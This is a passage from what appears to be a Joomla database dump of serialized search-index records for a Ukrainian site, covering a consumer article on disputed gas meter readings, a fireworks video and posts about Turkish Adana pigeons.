User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:120:\"/8-novini-2/2536-shcho-robiti-yakshcho-oblgaz-ne-vrakhovue-pokazniki-vashogo-lichilnika-j-vimagae-splatiti-za-zajvi-kubi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2536\";s:5:\"route\";s:161:\"index.php?option=com_content&view=article&id=2536:shcho-robiti-yakshcho-oblgaz-ne-vrakhovue-pokazniki-vashogo-lichilnika-j-vimagae-splatiti-za-zajvi-kubi&catid=8\";s:5:\"title\";s:180:\"Що робити, якщо облгаз не враховує показники вашого лічильника й вимагає сплатити за «зайві» куби?\";s:11:\"description\";s:3330:\" Люди масово скаржаться на маніпуляції з показниками газових лічильників. Як йдеться в зверненнях до інформаційно-консультаційного центру ГазПравда, облгази ігнорують вчасно передані домогосподарствами показники лічильників. Натомість споживачам виставляються інші показники – значно вищі, ніж споживачі фіксують в особистих кабінетах. Незважаючи на обурення споживачів, облгази відмовляються коригувати показники лічильників, мотивуючи це тим, що ті невчасно надали відповідну інформацію – тобто, пізніше 6 числа календарного місяця, що настає за розрахунковим. У такому разі експерти ГазПравди радять подавати претензію щодо завищених показів лічильників до облгазу, а також одразу скаргу до НКРЕКП. Адже часто газорозподільна компанія просто ігнорує звернення або відмовляє споживачам. Тому регулятор мав би звернути свою увагу на такі факти. ГазПравда підготувала зразки таких претензій та скарг. Документи розміщені на нашому сайті в розділі Бланки. Також претензію до облгазу щодо здійснення перерахунку за фактичними показниками лічильника можна скачати тут: https://gazpravda.com.ua/images/2021/Pretenziia_do_oblgaz_pokaz_lich.doc Скарга до регулятора про незаконні нарахування на основі завищених показників лічильника доступна за посиланням: https://gazpravda.com.ua/images/2021/Skarga_do_NKREKP_pokaz_lich.doc Зазначимо, що одна з ймовірних причин подібних маніпуляцій облгазів – це штучне завищення фактичного споживання газу домогосподарствами в поточному газовому році з метою отримання надприбутків при нарахуванні плати за доставку/розподіл блакитного палива у 2022 році. Адже саме на підставі фактично спожитого газу за період із 1 жовтня 2020 року по 30 вересня 2021 року облгаз буде здійснювати розрахунок щомісячної плати за доставку/розподіл газу кожному домогосподарству вже з січня 2022 року та протягом усього 2022 року. За матеріалами https://gazpravda.com.ua/ \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-10-19 17:08:52\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-10-19 17:08:52\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4945,'index.php?option=com_content&view=article&id=2538','index.php?option=com_content&view=article&id=2538:prosto-shedevralnij-novorichnij-salyut&catid=8','Просто шедевральний новорічний салют',' ','2022-01-02 18:59:22','c5d097b27a0da923d16aa7f5ce1883d3',1,1,1,'*','2022-01-02 16:50:14','0000-00-00 00:00:00','2022-01-02 16:50:14','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2538\";s:5:\"alias\";s:38:\"prosto-shedevralnij-novorichnij-salyut\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/phZ5U8wJ2pM\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-01-02 16:59:22\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:43:\"2538:prosto-shedevralnij-novorichnij-salyut\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:55:\"/8-novini-2/2538-prosto-shedevralnij-novorichnij-salyut\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2538\";s:5:\"route\";s:96:\"index.php?option=com_content&view=article&id=2538:prosto-shedevralnij-novorichnij-salyut&catid=8\";s:5:\"title\";s:69:\"Просто шедевральний новорічний салют\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2022-01-02 16:50:14\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-01-02 16:50:14\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4946,'index.php?option=com_content&view=category&id=137','index.php?option=com_content&view=category&id=137','Адана турецька',' ','2022-01-04 12:38:25','c0b591edd2b96ef3769958d193295c51',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2022-01-04 10:38:25','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:3:\"137\";s:5:\"alias\";s:14:\"adana-turetska\";s:7:\"summary\";s:1:\"	\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2022-01-04 10:38:25\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"168\";s:9:\"parent_id\";s:3:\"125\";s:5:\"level\";s:1:\"2\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:18:\"137:adana-turetska\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:26:\"/holuby/137-adana-turetska\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=category&id=137\";s:5:\"route\";s:49:\"index.php?option=com_content&view=category&id=137\";s:5:\"title\";s:27:\"Адана турецька\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-01-04 10:38:25\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4947,'index.php?option=com_content&view=article&id=2539','index.php?option=com_content&view=article&id=2539:posadka-turetskoji-adani&catid=137','Посадка турецької адани',' ','2022-01-04 12:44:12','515b8f56d01bf9a987452975606c94f2',1,1,1,'*','2022-01-04 10:44:12','0000-00-00 00:00:00','2022-01-04 10:44:12','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2539\";s:5:\"alias\";s:24:\"posadka-turetskoji-adani\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/daffbpWL6Vs\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"137\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-01-04 10:44:12\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:27:\"Адана турецька\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:29:\"2539:posadka-turetskoji-adani\";s:7:\"catslug\";s:18:\"137:adana-turetska\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:52:\"/holuby/adana-turetska/2539-posadka-turetskoji-adani\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:27:\"Адана турецька\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:27:\"Адана турецька\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2539\";s:5:\"route\";s:84:\"index.php?option=com_content&view=article&id=2539:posadka-turetskoji-adani&catid=137\";s:5:\"title\";s:44:\"Посадка турецької адани\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2022-01-04 10:44:12\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-01-04 10:44:12\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4948,'index.php?option=com_content&view=article&id=2540','index.php?option=com_content&view=article&id=2540:moya-para-podarok-vid-oblako&catid=137','Моя пара - подарок від OBLAKO',' ','2022-01-04 14:17:45','360d6c5e6a284d6f0f45dea36a8b2d2a',1,1,1,'*','2022-01-04 12:17:45','0000-00-00 00:00:00','2022-01-04 12:17:45','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2540\";s:5:\"alias\";s:28:\"moya-para-podarok-vid-oblako\";s:7:\"summary\";s:439:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/photo_2022-01-04_14-12-21.jpg\"><img src=\"https://malehus.in.ua/images/stories/photo_2022-01-04_14-12-21.jpg\" alt=\"\" class=\"fr-fin fr-dib\" width=\"759\"></a></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/photo_2022-01-04_14-12-26.jpg\"><img src=\"https://malehus.in.ua/images/stories/photo_2022-01-04_14-12-26.jpg\" alt=\"\" class=\"fr-fin\" width=\"758\"></a><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"137\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-01-04 12:17:45\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\